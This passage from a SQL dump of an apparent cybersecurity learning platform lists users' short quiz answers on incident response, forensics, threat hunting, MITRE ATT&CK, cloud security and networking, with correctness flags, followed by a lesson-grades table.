(282, 232, 6014, 'Volatile memory (RAM) evidence is lost', 1, '2026-03-09 18:05:08'),
(283, 232, 6015, 'Isolating compromised systems while keeping them accessible', 1, '2026-03-09 18:05:08'),
(284, 232, 6016, 'Malware and persistence mechanisms', 1, '2026-03-09 18:06:00'),
(285, 232, 6017, 'Validate it is clean', 1, '2026-03-09 18:06:00'),
(286, 232, 6018, 'To detect re-infection before spreading', 1, '2026-03-09 18:06:00'),
(287, 232, 6019, 'Within 1-2 weeks of incident closure', 1, '2026-03-09 18:06:54'),
(288, 232, 6020, 'Document what happened and recommendations', 1, '2026-03-09 18:06:55'),
(289, 232, 6021, 'Update SIEM rules, playbooks, and train staff', 1, '2026-03-09 18:06:55'),
(290, 232, 6022, 'NIST SP 800-61', 1, '2026-03-09 18:07:51'),
(291, 232, 6023, 'Preparation', 1, '2026-03-09 18:07:51'),
(292, 232, 6024, 'Containment', 1, '2026-03-09 18:07:51'),
(293, 232, 6025, 'It contains forensic evidence lost on shutdown', 1, '2026-03-09 18:07:52'),
(294, 232, 6026, 'Playbook', 1, '2026-03-09 18:07:52'),
(295, 232, 6027, 'Lessons Learned and improvement', 1, '2026-03-09 18:07:53'),
(296, 232, 6001, 'Computer Security Incident Response Team', 1, '2026-03-09 18:08:50'),
(297, 232, 6002, 'It ensures consistent and fast response', 1, '2026-03-09 18:08:50'),
(298, 232, 6003, 'Malware infection', 1, '2026-03-09 18:08:50'),
(299, 232, 6028, 'Preserve the evidence', 1, '2026-03-09 18:09:49'),
(300, 232, 6029, 'Memory Forensics', 1, '2026-03-09 18:09:49'),
(301, 232, 6030, 'eDiscovery and litigation support', 1, '2026-03-09 18:09:49'),
(302, 232, 6031, 'Identification', 1, '2026-03-09 18:10:32'),
(303, 232, 6032, 'FTK Imager', 1, '2026-03-09 18:10:33'),
(304, 232, 6033, 'Chain of Custody', 1, '2026-03-09 18:10:33'),
(305, 232, 6034, 'Evidence may be inadmissible in court', 1, '2026-03-09 18:11:18'),
(306, 232, 6035, 'Allows reading but prevents writing to evidence', 1, '2026-03-09 18:11:18'),
(307, 232, 6036, 'Photograph the scene', 1, '2026-03-09 18:11:18'),
(308, 232, 6037, 'To preserve the original evidence', 1, '2026-03-09 18:12:21'),
(309, 232, 6038, 'Physical Image', 1, '2026-03-09 18:12:22'),
(310, 232, 6039, 'Compare hashes of source and image', 1, '2026-03-09 18:12:22'),
(311, 232, 6040, 'Master File Table - database of all files', 1, '2026-03-09 18:13:07'),
(312, 232, 6041, 'Hiding data attached to files', 1, '2026-03-09 18:13:07'),
(313, 232, 6042, 'Modifying timestamps to hide activity', 1, '2026-03-09 18:13:07'),
(314, 232, 6043, 'SAM', 1, '2026-03-09 18:13:50'),
(315, 232, 6044, 'Programs that have been executed', 1, '2026-03-09 18:13:51'),
(316, 232, 6045, 'C:\\Windows\\System32\\winevt', 1, '2026-03-09 18:13:51'),
(317, 232, 6046, 'Preserve the evidence', 1, '2026-03-09 18:14:21'),
(318, 232, 6047, 'Volatility', 1, '2026-03-09 18:14:22'),
(319, 232, 6048, 'Writing to evidence (preserve integrity)', 1, '2026-03-09 18:14:22'),
(320, 232, 6049, 'Prefetch', 1, '2026-03-09 18:14:22'),
(321, 232, 6050, 'Alternate Data Streams (ADS)', 1, '2026-03-09 18:14:23'),
(322, 232, 6051, 'Verify image integrity', 1, '2026-03-09 18:14:23'),
(323, 232, 6067, 'Bro', 1, '2026-03-10 16:36:40'),
(324, 232, 6068, 'conn.log', 1, '2026-03-10 16:36:40'),
(325, 232, 6069, 'Zeek generates structured logs, better for automation', 1, '2026-03-10 16:36:41'),
(326, 232, 6070, 'Wireshark', 0, '2026-03-10 16:37:26'),
(327, 232, 6071, 'http.request', 1, '2026-03-10 16:37:28'),
(328, 232, 6072, 'SYN, SYN-ACK, ACK', 1, '2026-03-10 16:37:28'),
(329, 232, 6073, 'Possible C2 communication', 1, '2026-03-10 16:37:29'),
(330, 232, 6074, 'dns.log', 1, '2026-03-10 16:37:29'),
(331, 232, 6075, 'PCAP', 1, '2026-03-10 16:37:29'),
(332, 232, 6052, 'Network Traffic Analysis', 1, '2026-03-10 16:42:21'),
(333, 232, 6053, 'Encryption (TLS)', 1, '2026-03-10 16:42:22'),
(334, 232, 6054, 'Source/Destination IPs and ports', 1, '2026-03-10 16:42:22'),
(335, 232, 6055, 'A switch port that mirrors traffic for monitoring', 1, '2026-03-10 16:46:19'),
(336, 232, 6056, 'PCAP', 1, '2026-03-10 16:46:20'),
(337, 232, 6057, 'Wireshark', 1, '2026-03-10 16:46:20'),
(338, 232, 6058, 'Follow TCP Stream', 1, '2026-03-10 16:56:34'),
(339, 232, 6059, 'Showing only relevant packets', 1, '2026-03-10 16:56:34'),
(340, 232, 6060, 'dns', 1, '2026-03-10 16:56:35'),
(341, 232, 6061, 'SYN', 1, '2026-03-10 16:58:04'),
(342, 232, 6062, 'Export Objects > HTTP', 1, '2026-03-10 16:58:05'),
(343, 232, 6063, 'Buffer overflow attempt', 1, '2026-03-10 16:58:05'),
(344, 232, 6064, 'Regular, timed connections to a C2 server', 1, '2026-03-10 17:05:42'),
(345, 232, 6065, 'Default Metasploit/Meterpreter port', 1, '2026-03-10 17:05:43'),
(346, 232, 6066, 'Domain Generation Algorithm', 1, '2026-03-10 17:05:43'),
(347, 232, 6076, 'SOC reacts to alerts; Hunting proactively searches', 1, '2026-03-10 17:32:43'),
(348, 232, 6077, 'Time an attacker stays undetected in the network', 1, '2026-03-10 17:32:43'),
(349, 232, 6078, 'They specifically evade automated detection', 1, '2026-03-10 17:32:44'),
(350, 232, 6079, 'Pre-defined rules/signatures', 1, '2026-03-10 17:37:08'),
(351, 232, 6080, 'Create a detection rule for future attacks', 1, '2026-03-10 17:37:08'),
(352, 232, 6081, 'Proactive and hypothesis-driven', 1, '2026-03-10 17:37:09'),
(353, 232, 6082, 'Form a Hypothesis', 1, '2026-03-10 17:40:07'),
(354, 232, 6083, 'No, you learned what normal looks like', 1, '2026-03-10 17:40:10'),
(355, 232, 6084, 'Document findings and create detections', 1, '2026-03-10 17:40:10'),
(356, 232, 6085, 'Specific, actionable, based on threat intel', 1, '2026-03-10 17:48:56'),
(357, 232, 6086, 'MITRE ATT&CK', 1, '2026-03-10 17:48:56'),
(358, 232, 6087, 'Something bad might happen (too vague)', 1, '2026-03-10 17:48:56'),
(359, 232, 6088, 'EDR', 1, '2026-03-10 17:51:33'),
(360, 232, 6089, 'Determines how far back you can hunt', 1, '2026-03-10 17:51:34'),
(361, 232, 6090, 'Sysmon', 1, '2026-03-10 17:51:34'),
(362, 232, 6091, 'Rare occurrences (outliers)', 1, '2026-03-10 17:54:27'),
(363, 232, 6092, 'Values that appear very rarely', 1, '2026-03-10 17:54:27'),
(364, 232, 6093, 'Moving from one indicator to related data', 1, '2026-03-10 17:54:28'),
(365, 232, 6094, 'Proactive search for undetected threats', 1, '2026-03-10 17:54:49'),
(366, 232, 6095, 'Time attacker remains undetected', 1, '2026-03-10 17:54:49'),
(367, 232, 6096, 'Specific and actionable', 1, '2026-03-10 17:54:50'),
(368, 232, 6097, 'MITRE ATT&CK', 1, '2026-03-10 17:54:50'),
(369, 232, 6098, 'Rare occurrences', 1, '2026-03-10 17:54:50'),
(370, 232, 6099, 'Create a detection rule', 1, '2026-03-10 17:54:51'),
(371, 225, 5264, 'C:', 1, '2026-03-10 22:49:29'),
(372, 225, 5265, 'NTFS', 1, '2026-03-10 22:49:30'),
(373, 225, 5266, '4 GB', 1, '2026-03-10 22:49:30'),
(374, 225, 5267, 'User Account Control', 1, '2026-03-10 22:54:34'),
(375, 225, 5268, 'Blue', 1, '2026-03-10 22:54:35'),
(376, 225, 5269, 'Always Notify', 1, '2026-03-10 22:54:35'),
(377, 225, 5270, 'HKLM', 1, '2026-03-11 04:06:22'),
(378, 225, 5271, 'regedit', 1, '2026-03-11 04:06:23'),
(379, 225, 5272, 'REG_SZ', 1, '2026-03-11 04:06:23'),
(380, 260, 5339, 'Network', 1, '2026-03-11 04:52:09'),
(381, 260, 5340, 'Segments', 1, '2026-03-11 04:52:10'),
(382, 260, 5341, 'Presentation', 1, '2026-03-11 04:52:11'),
(383, 260, 5342, 'TCP', 1, '2026-03-11 04:57:06'),
(384, 260, 5343, 'Speed', 1, '2026-03-11 04:57:07'),
(385, 260, 5344, 'Internet', 1, '2026-03-11 04:57:07'),
(386, 232, 6100, 'Knowledge base of adversary tactics and techniques', 1, '2026-03-11 16:47:50'),
(387, 232, 6101, 'The adversary\'s goal', 1, '2026-03-11 16:47:51'),
(388, 232, 6102, 'Enterprise', 1, '2026-03-11 16:47:51'),
(389, 232, 6103, '14', 1, '2026-03-11 16:54:37'),
(390, 232, 6104, 'Credential Access', 1, '2026-03-11 16:54:37'),
(391, 232, 6105, 'Persistence', 1, '2026-03-11 16:54:38'),
(392, 232, 6106, 'A more specific method under a main technique', 1, '2026-03-11 17:07:41'),
(393, 232, 6107, 'PowerShell execution', 1, '2026-03-11 17:07:42'),
(394, 232, 6108, 'Real-world example of technique usage', 1, '2026-03-11 17:07:42'),
(395, 232, 6109, 'ATT&CK Navigator', 1, '2026-03-11 17:10:34'),
(396, 232, 6110, 'Tactics', 1, '2026-03-11 17:10:34'),
(397, 232, 6111, 'STIX', 1, '2026-03-11 17:10:35'),
(398, 232, 6112, 'Check if it detects specific techniques', 1, '2026-03-11 17:11:58'),
(399, 232, 6113, 'Identifying techniques you cannot detect', 1, '2026-03-11 17:11:58'),
(400, 232, 6114, 'Building defenses based on likely threat actors', 1, '2026-03-11 17:11:59'),
(401, 232, 6115, 'Adversarial Tactics, Techniques, and Common Knowledge', 1, '2026-03-11 17:15:44'),
(402, 232, 6116, '14', 1, '2026-03-11 17:15:44'),
(403, 232, 6117, 'How adversaries achieve goals', 1, '2026-03-11 17:15:45'),
(404, 232, 6118, 'Command and Scripting Interpreter', 1, '2026-03-11 17:15:45'),
(405, 232, 6119, 'Navigator', 1, '2026-03-11 17:15:45'),
(406, 232, 6120, 'Techniques you cannot detect', 1, '2026-03-11 17:15:46'),
(407, 225, 5273, 'Active Directory', 1, '2026-03-12 03:20:05'),
(408, 225, 5274, 'Domain Controller', 1, '2026-03-12 03:20:05'),
(409, 225, 5275, 'Kerberos', 1, '2026-03-12 03:20:06'),
(410, 225, 5276, 'Verb-Noun', 1, '2026-03-12 03:22:43'),
(411, 225, 5277, 'Get-Process', 1, '2026-03-12 03:22:44'),
(412, 225, 5278, '.ps1', 1, '2026-03-12 03:22:44'),
(413, 225, 5279, '4624', 1, '2026-03-12 04:05:06'),
(414, 225, 5280, '4625', 1, '2026-03-12 04:05:06'),
(415, 225, 5281, 'Security', 1, '2026-03-12 04:05:07'),
(416, 225, 5282, 'Group Policy Object', 1, '2026-03-12 05:09:39'),
(417, 225, 5283, 'gpupdate /force', 1, '2026-03-12 05:09:39'),
(418, 225, 5284, 'LSDOU', 1, '2026-03-12 05:09:40'),
(419, 225, 5285, 'Windows Defender', 1, '2026-03-12 05:13:47'),
(420, 225, 5286, 'Process Explorer', 1, '2026-03-12 05:13:47'),
(421, 225, 5287, 'BitLocker', 1, '2026-03-12 05:13:47'),
(422, 225, 5339, 'Network', 1, '2026-03-12 05:21:04'),
(423, 225, 5340, 'Segments', 1, '2026-03-12 05:21:04'),
(424, 225, 5341, 'Presentation', 1, '2026-03-12 05:21:05'),
(425, 225, 5342, 'TCP', 1, '2026-03-12 05:22:48'),
(426, 225, 5343, 'Speed', 1, '2026-03-12 05:22:48'),
(427, 225, 5344, 'Internet', 1, '2026-03-12 05:22:48'),
(428, 225, 5345, '192.168.1.10', 1, '2026-03-12 05:24:52'),
(429, 225, 5346, '32', 1, '2026-03-12 05:24:53'),
(430, 225, 5347, 'NAT', 1, '2026-03-12 05:24:53'),
(431, 225, 5348, '/24', 1, '2026-03-12 05:28:36'),
(432, 225, 5349, '254', 1, '2026-03-12 05:28:36'),
(433, 225, 5350, 'Network ID', 1, '2026-03-12 05:28:36'),
(434, 225, 5351, 'A', 1, '2026-03-12 05:30:16'),
(435, 225, 5352, 'MX', 1, '2026-03-12 05:30:17'),
(436, 225, 5353, 'DNS', 1, '2026-03-12 05:30:17'),
(437, 225, 5354, 'Discover', 1, '2026-03-12 05:31:37'),
(438, 225, 5355, 'IP to MAC', 1, '2026-03-12 05:31:38'),
(439, 225, 5356, 'ARP Spoofing', 1, '2026-03-12 05:31:38'),
(440, 225, 5357, '22', 1, '2026-03-12 05:33:01'),
(441, 225, 5358, 'Telnet', 1, '2026-03-12 05:33:02'),
(442, 225, 5359, 'SMB', 1, '2026-03-12 05:33:02'),
(443, 225, 5363, 'HTTP', 1, '2026-03-12 05:34:28'),
(444, 225, 5364, 'SuperSecret123', 1, '2026-03-12 05:34:29'),
(445, 225, 5365, 'Use HTTPS', 1, '2026-03-12 05:34:29'),
(446, 225, 5366, 'Router', 1, '2026-03-12 05:36:45'),
(447, 225, 5367, '127.0.0.1', 1, '2026-03-12 05:36:45'),
(448, 225, 5368, 'ping', 1, '2026-03-12 05:36:45'),
(449, 225, 5369, '255.255.255.0', 1, '2026-03-12 05:36:46'),
(450, 225, 5370, '80', 1, '2026-03-12 05:36:46'),
(451, 225, 5371, '443', 1, '2026-03-12 05:36:47'),
(452, 225, 5372, '53', 1, '2026-03-12 05:36:47'),
(453, 225, 5373, 'Physical', 1, '2026-03-12 05:36:47'),
(454, 225, 5374, '32 bits', 0, '2026-03-12 05:36:48'),
(455, 225, 5375, '64 bits', 0, '2026-03-12 05:36:48'),
(456, 225, 5376, 'TCP', 1, '2026-03-12 05:36:49'),
(457, 225, 5377, 'SYN', 1, '2026-03-12 05:36:49'),
(458, 225, 5378, 'Discover', 1, '2026-03-12 05:36:49'),
(459, 225, 5379, '192.168.1.50', 1, '2026-03-12 05:36:50'),
(460, 225, 5380, 'Resolves IP to MAC', 1, '2026-03-12 05:36:50'),
(461, 225, 5381, 'ICMP', 1, '2026-03-12 05:36:50'),
(462, 225, 5382, 'Switch', 1, '2026-03-12 05:36:51'),
(463, 225, 5383, 'AAAA', 1, '2026-03-12 05:36:51'),
(464, 225, 5384, '21', 1, '2026-03-12 05:36:52'),
(465, 225, 5385, 'Packet Capture', 1, '2026-03-12 05:36:52'),
(466, 225, 5427, 'Confidentiality', 1, '2026-03-13 02:27:15'),
(467, 225, 5428, 'Integrity', 1, '2026-03-13 02:27:16'),
(468, 225, 5429, 'Availability', 1, '2026-03-13 02:27:16'),
(469, 225, 5430, 'Biometrics', 1, '2026-03-13 02:33:05'),
(470, 225, 5431, 'Smart Card', 1, '2026-03-13 02:33:05'),
(471, 225, 5432, 'MFA', 1, '2026-03-13 02:33:06'),
(472, 225, 5433, 'Authentication', 1, '2026-03-13 02:35:31'),
(473, 225, 5434, 'MAC', 1, '2026-03-13 02:35:32'),
(474, 225, 5435, 'Least Privilege', 1, '2026-03-13 02:35:32'),
(475, 225, 5436, 'Accounting', 1, '2026-03-13 02:36:36'),
(476, 225, 5437, 'Non-Repudiation', 1, '2026-03-13 02:36:37'),
(477, 225, 5438, 'Forensics', 1, '2026-03-13 02:36:37'),
(478, 225, 5439, 'Symmetric', 1, '2026-03-13 02:38:01'),
(479, 225, 5440, 'AES', 1, '2026-03-13 02:38:02'),
(480, 225, 5441, 'Readable data', 1, '2026-03-13 02:38:02'),
(481, 225, 5442, 'No', 1, '2026-03-13 02:39:28'),
(482, 225, 5443, 'Integrity', 1, '2026-03-13 02:39:29'),
(483, 225, 5444, 'SHA-256', 1, '2026-03-13 02:39:29'),
(484, 225, 5445, 'Layered Security', 1, '2026-03-13 02:41:06'),
(485, 225, 5446, 'Human', 1, '2026-03-13 02:41:06'),
(486, 225, 5447, 'Redundancy', 1, '2026-03-13 02:41:07'),
(487, 225, 5448, 'CIA', 1, '2026-03-13 02:43:47'),
(488, 225, 5449, 'Availability', 1, '2026-03-13 02:43:47'),
(489, 225, 5450, 'Biometrics', 1, '2026-03-13 02:43:48'),
(490, 225, 5451, 'Authentication', 1, '2026-03-13 02:43:48'),
(491, 225, 5452, 'Authorization', 1, '2026-03-13 02:43:49'),
(492, 225, 5453, 'MAC', 1, '2026-03-13 02:43:49'),
(493, 225, 5454, 'RBAC', 0, '2026-03-13 02:43:50'),
(494, 225, 5455, 'Accounting', 1, '2026-03-13 02:43:50'),
(495, 225, 5456, 'Asymmetric', 1, '2026-03-13 02:43:50'),
(496, 225, 5457, 'Symmetric', 1, '2026-03-13 02:43:51'),
(497, 225, 5458, 'Hashing', 1, '2026-03-13 02:43:51'),
(498, 225, 5459, 'SHA-256', 1, '2026-03-13 02:43:52'),
(499, 225, 5460, 'User Training', 1, '2026-03-13 02:43:52'),
(500, 225, 5461, 'Defense in Depth', 1, '2026-03-13 02:43:52'),
(501, 225, 5462, 'Proof of origin', 1, '2026-03-13 02:43:53'),
(502, 225, 5463, 'Hashing', 1, '2026-03-13 02:43:53'),
(503, 225, 5464, 'Multi-Factor Authentication', 1, '2026-03-13 02:43:54'),
(504, 225, 5465, 'No', 1, '2026-03-13 02:43:54'),
(505, 225, 5466, 'Network', 1, '2026-03-13 02:43:55'),
(506, 225, 5467, 'Authorization', 1, '2026-03-13 02:43:55'),
(507, 42, 5522, 'DEBUG', 0, '2026-03-13 10:09:26'),
(508, 42, 5523, 'root', 0, '2026-03-13 10:09:26'),
(509, 42, 5524, 'auth_db', 0, '2026-03-13 10:09:26'),
(510, 232, 6130, 'Cloud-native SIEM', 1, '2026-03-13 16:06:32'),
(511, 232, 6131, 'Just-in-time admin access', 1, '2026-03-13 16:06:32'),
(512, 232, 6132, 'Key Vault', 1, '2026-03-13 16:06:33'),
(513, 232, 6133, 'Misconfigurations', 1, '2026-03-13 16:09:14'),
(514, 232, 6134, 'Cloud Security Posture Management', 1, '2026-03-13 16:09:14'),
(515, 232, 6135, 'A critical misconfiguration', 1, '2026-03-13 16:09:14'),
(516, 232, 6136, 'Provider', 0, '2026-03-13 16:10:22'),
(517, 232, 6137, 'Security responsibilities between customer and provider', 1, '2026-03-13 16:10:23'),
(518, 232, 6138, 'GuardDuty', 1, '2026-03-13 16:10:23'),
(519, 232, 6139, 'Cloud-native SIEM', 1, '2026-03-13 16:10:24'),
(520, 232, 6140, 'A major security risk', 1, '2026-03-13 16:10:24'),
(521, 232, 6141, 'Cloud misconfigurations', 1, '2026-03-13 16:10:24'),
(522, 232, 6121, 'The customer', 1, '2026-03-13 16:15:54'),
(523, 232, 6122, 'SaaS', 1, '2026-03-13 16:15:54'),
(524, 232, 6123, 'IaaS', 1, '2026-03-13 16:15:54'),
(525, 232, 6124, 'The cloud provider', 1, '2026-03-13 16:17:24'),
(526, 232, 6125, 'The customer (always)', 1, '2026-03-13 16:17:24'),
(527, 232, 6126, 'Data and user access', 1, '2026-03-13 16:17:24'),
(528, 232, 6127, 'CloudTrail', 1, '2026-03-13 16:18:40'),
(529, 232, 6128, 'Public Access', 1, '2026-03-13 16:18:41'),
(530, 232, 6129, 'Identity and Access Management', 1, '2026-03-13 16:18:41'),
(531, 232, 6142, 'Being overwhelmed by too many alerts', 1, '2026-03-14 04:50:02'),
(532, 232, 6143, 'Speed and consistency', 1, '2026-03-14 04:50:02'),
(533, 232, 6144, 'Repetitive enrichment lookups', 1, '2026-03-14 04:50:02'),
(534, 232, 6145, 'Security Orchestration, Automation, and Response', 1, '2026-03-14 04:52:41'),
(535, 232, 6146, 'TheHive / Shuffle', 1, '2026-03-14 04:52:42'),
(536, 232, 6147, 'API integrations', 1, '2026-03-14 04:52:42'),
(537, 232, 6148, 'Trigger (what starts the workflow)', 1, '2026-03-14 04:56:27'),
(538, 232, 6149, 'For critical actions requiring approval', 1, '2026-03-14 04:56:27'),
(539, 232, 6150, 'Logging and error handling', 1, '2026-03-14 04:56:28'),
(540, 232, 6151, 'Isolate the host', 1, '2026-03-14 04:57:44'),
(541, 232, 6152, 'SIEM and Firewall blocklists', 1, '2026-03-14 04:57:45'),
(542, 232, 6153, 'Force password reset and revoke sessions', 1, '2026-03-14 04:57:45'),
(543, 232, 6154, 'requests', 1, '2026-03-14 04:58:48'),
(544, 232, 6155, 'Simple syntax and great libraries', 1, '2026-03-14 04:58:48'),
(545, 232, 6156, 'File hashes (MD5, SHA256)', 1, '2026-03-14 04:58:48'),
(546, 232, 6157, 'Security Orchestration, Automation, and Response', 1, '2026-03-14 04:59:15'),
(547, 232, 6158, 'Speed and consistency', 1, '2026-03-14 04:59:15'),
(548, 232, 6159, 'A trigger (e.g., SIEM alert)', 1, '2026-03-14 04:59:16'),
(549, 232, 6160, 'requests', 1, '2026-03-14 04:59:16'),
(550, 232, 6161, 'Isolate the host', 1, '2026-03-14 04:59:16'),
(551, 232, 6162, 'Open-source SOAR', 1, '2026-03-14 04:59:17'),
(552, 232, 6163, 'You will forget details later', 1, '2026-03-14 05:01:00'),
(553, 232, 6164, 'Legal evidence and audits', 1, '2026-03-14 05:01:00'),
(554, 232, 6165, 'Vague language like \"some malware\"', 1, '2026-03-14 05:01:00'),
(555, 232, 6166, 'UTC', 1, '2026-03-14 05:02:08'),
(556, 232, 6167, 'Timestamp, Source, Event, Actor', 1, '2026-03-14 05:02:10'),
(557, 232, 6168, 'To support claims with proof', 1, '2026-03-14 05:02:10'),
(558, 232, 6169, 'Executive Summary', 1, '2026-03-14 05:03:16'),
(559, 232, 6170, 'Leadership (non-technical)', 1, '2026-03-14 05:03:16'),
(560, 232, 6171, 'Raw logs, hashes, supporting evidence', 1, '2026-03-14 05:03:16'),
(561, 232, 6172, 'Technical jargon', 1, '2026-03-14 05:03:57'),
(562, 232, 6173, 'In business terms (money, data, reputation)', 1, '2026-03-14 05:03:57'),
(563, 232, 6174, 'What happened and are we safe?', 1, '2026-03-14 05:03:57'),
(564, 232, 6175, 'Mean Time to Detect', 1, '2026-03-14 05:04:33'),
(565, 232, 6176, 'Poor detection rules', 1, '2026-03-14 05:04:34'),
(566, 232, 6177, 'To identify trends and improvements', 1, '2026-03-14 05:04:34'),
(567, 232, 6178, 'UTC', 1, '2026-03-14 05:04:59'),
(568, 232, 6179, 'Leadership', 1, '2026-03-14 05:04:59'),
(569, 232, 6180, 'Mean Time to Respond', 1, '2026-03-14 05:04:59'),
(570, 232, 6181, 'Vague language', 1, '2026-03-14 05:05:00'),
(571, 232, 6182, 'Tracking trends over time', 1, '2026-03-14 05:05:00'),
(572, 232, 6183, 'Raw evidence and supporting data', 1, '2026-03-14 05:05:00'),
(573, 260, 5345, '192.168.1.10', 1, '2026-03-15 13:50:55'),
(574, 260, 5346, '32', 1, '2026-03-15 13:50:56'),
(575, 260, 5347, 'NAT', 1, '2026-03-15 13:50:57'),
(576, 260, 5348, '/24', 1, '2026-03-15 14:01:08'),
(577, 260, 5349, '254', 1, '2026-03-15 14:01:08'),
(578, 260, 5350, 'Network ID', 1, '2026-03-15 14:01:09'),
(579, 260, 5351, 'A', 1, '2026-03-15 14:12:54'),
(580, 260, 5352, 'MX', 1, '2026-03-15 14:12:54'),
(581, 260, 5353, 'DNS', 1, '2026-03-15 14:12:55'),
(582, 260, 5354, 'Discover', 1, '2026-03-15 16:04:36'),
(583, 260, 5355, 'IP to MAC', 1, '2026-03-15 16:04:36'),
(584, 260, 5356, 'ARP Spoofing', 1, '2026-03-15 16:04:37'),
(585, 260, 5357, '22', 1, '2026-03-15 16:15:05'),
(586, 260, 5358, 'Telnet', 1, '2026-03-15 16:15:05'),
(587, 260, 5359, 'SMB', 1, '2026-03-15 16:15:06'),
(588, 260, 5363, 'HTTP', 1, '2026-03-15 16:29:35'),
(589, 260, 5364, 'SuperSecret123', 1, '2026-03-15 16:29:35'),
(590, 260, 5365, 'Use HTTPS', 1, '2026-03-15 16:29:35'),
(591, 260, 5366, 'Router', 1, '2026-03-15 16:59:09'),
(592, 260, 5367, '127.0.0.1', 1, '2026-03-15 16:59:10'),
(593, 260, 5368, 'ping', 1, '2026-03-15 16:59:10'),
(594, 260, 5369, '255.255.255.0', 1, '2026-03-15 16:59:11'),
(595, 260, 5370, '80', 1, '2026-03-15 16:59:11'),
(596, 260, 5371, '443', 1, '2026-03-15 16:59:11'),
(597, 260, 5372, '53', 1, '2026-03-15 16:59:12'),
(598, 260, 5373, 'Application', 0, '2026-03-15 16:59:12'),
(599, 260, 5374, '48 bits', 1, '2026-03-15 16:59:13'),
(600, 260, 5375, '128 bits', 1, '2026-03-15 16:59:13'),
(601, 260, 5376, 'UDP', 0, '2026-03-15 16:59:14'),
(602, 260, 5377, 'SYN', 1, '2026-03-15 16:59:14'),
(603, 260, 5378, 'Discover', 1, '2026-03-15 16:59:14'),
(604, 260, 5379, '192.168.1.50', 1, '2026-03-15 16:59:15'),
(605, 260, 5380, 'Resolves IP to MAC', 1, '2026-03-15 16:59:15'),
(606, 260, 5381, 'ICMP', 1, '2026-03-15 16:59:16'),
(607, 260, 5382, 'Switch', 1, '2026-03-15 16:59:16'),
(608, 260, 5383, 'AAAA', 1, '2026-03-15 16:59:17'),
(609, 260, 5384, '20', 0, '2026-03-15 16:59:17'),
(610, 260, 5385, 'Password Cracking', 0, '2026-03-15 16:59:17'),
(611, 303, 5881, 'Connecting related events to detect threats', 1, '2026-03-15 17:37:42'),
(612, 303, 5882, 'Compliance and Forensic Investigation', 1, '2026-03-15 17:37:42'),
(613, 303, 5883, 'Forwarder / Agent', 1, '2026-03-15 17:37:43'),
(614, 260, 5427, 'Confidentiality', 1, '2026-03-15 18:10:48'),
(615, 260, 5428, 'Integrity', 1, '2026-03-15 18:10:49'),
(616, 260, 5429, 'Availability', 1, '2026-03-15 18:10:49'),
(617, 260, 5430, 'Biometrics', 1, '2026-03-15 18:24:12'),
(618, 260, 5431, 'Smart Card', 1, '2026-03-15 18:24:13'),
(619, 260, 5432, 'MFA', 1, '2026-03-15 18:24:13'),
(620, 260, 5433, 'Authentication', 1, '2026-03-15 18:57:21'),
(621, 260, 5434, 'MAC', 1, '2026-03-15 18:57:21'),
(622, 260, 5435, 'Least Privilege', 1, '2026-03-15 18:57:22'),
(623, 260, 5436, 'Accounting', 1, '2026-03-15 19:44:14'),
(624, 260, 5437, 'Non-Repudiation', 1, '2026-03-15 19:44:14'),
(625, 260, 5438, 'Forensics', 1, '2026-03-15 19:44:15'),
(626, 260, 5439, 'Symmetric', 1, '2026-03-15 20:23:10'),
(627, 260, 5440, 'AES', 1, '2026-03-15 20:23:11'),
(628, 260, 5441, 'Readable data', 1, '2026-03-15 20:23:11'),
(629, 260, 5442, 'No', 1, '2026-03-15 20:44:12'),
(630, 260, 5443, 'Integrity', 1, '2026-03-15 20:44:13'),
(631, 260, 5444, 'SHA-256', 1, '2026-03-15 20:44:13'),
(632, 260, 5445, 'Layered Security', 1, '2026-03-15 21:16:39'),
(633, 260, 5446, 'Human', 1, '2026-03-15 21:16:40'),
(634, 260, 5447, 'Redundancy', 1, '2026-03-15 21:16:40'),
(635, 260, 5448, 'CIA', 1, '2026-03-15 21:27:46'),
(636, 260, 5449, 'Availability', 1, '2026-03-15 21:27:47'),
(637, 260, 5450, 'Biometrics', 1, '2026-03-15 21:27:48'),
(638, 260, 5451, 'Authentication', 1, '2026-03-15 21:27:49'),
(639, 260, 5452, 'Authorization', 1, '2026-03-15 21:27:49'),
(640, 260, 5453, 'MAC', 1, '2026-03-15 21:27:50'),
(641, 260, 5454, 'DAC', 1, '2026-03-15 21:27:50'),
(642, 260, 5455, 'Accounting', 1, '2026-03-15 21:27:51'),
(643, 260, 5456, 'Asymmetric', 1, '2026-03-15 21:27:52'),
(644, 260, 5457, 'Symmetric', 1, '2026-03-15 21:27:53'),
(645, 260, 5458, 'Hashing', 1, '2026-03-15 21:27:53'),
(646, 260, 5459, 'SHA-256', 1, '2026-03-15 21:27:54'),
(647, 260, 5460, 'User Training', 1, '2026-03-15 21:27:54'),
(648, 260, 5461, 'Defense in Depth', 1, '2026-03-15 21:27:55'),
(649, 260, 5462, 'Proof of origin', 1, '2026-03-15 21:27:55'),
(650, 260, 5463, 'Hashing', 1, '2026-03-15 21:27:56'),
(651, 260, 5464, 'Multi-Factor Authentication', 1, '2026-03-15 21:27:57'),
(652, 260, 5465, 'No', 1, '2026-03-15 21:27:57'),
(653, 260, 5466, 'Network', 1, '2026-03-15 21:27:58'),
(654, 260, 5467, 'Authorization', 1, '2026-03-15 21:27:58');

-- --------------------------------------------------------

--
-- Table structure for table `user_lesson_grades`
--

CREATE TABLE `user_lesson_grades` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `task_id` int(11) NOT NULL,
  `score` decimal(5,2) NOT NULL,
  `total_questions` int(11) NOT NULL,
  `correct_answers` int(11) NOT NULL,
  `passed` tinyint(1) DEFAULT 0,
  `completed_at` timestamp NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_lesson_grades`
--

INSERT INTO `user_lesson_grades` (`id`, `user_id`, `task_id`, `score`, `total_questions`, `correct_answers`, `passed`, `completed_at`) VALUES
(1, 34, 1, 100.00, 4, 4, 1, '2025-12-26 01:24:19'),
(2, 34, 3, 100.00, 4, 4, 1, '2025-12-26 02:00:03'),
(3, 1, 1, 100.00, 3, 3, 1, '2025-12-26 15:29:20'),
(4, 34, 349, 92.00, 1, 1, 1, '2025-12-26 18:37:54'),
(5, 34, 350, 85.00, 1, 1, 1, '2025-12-26 19:11:06'),
(6, 34, 6, 100.00, 1, 1, 1, '2025-12-26 20:10:11'),
(7, 34, 7, 100.00, 1, 1, 1, '2025-12-26 20:14:32'),
(8, 34, 8, 100.00, 1, 1, 1, '2025-12-26 20:20:31'),
(9, 34, 9, 100.00, 1, 1, 1, '2025-12-26 20:22:23'),
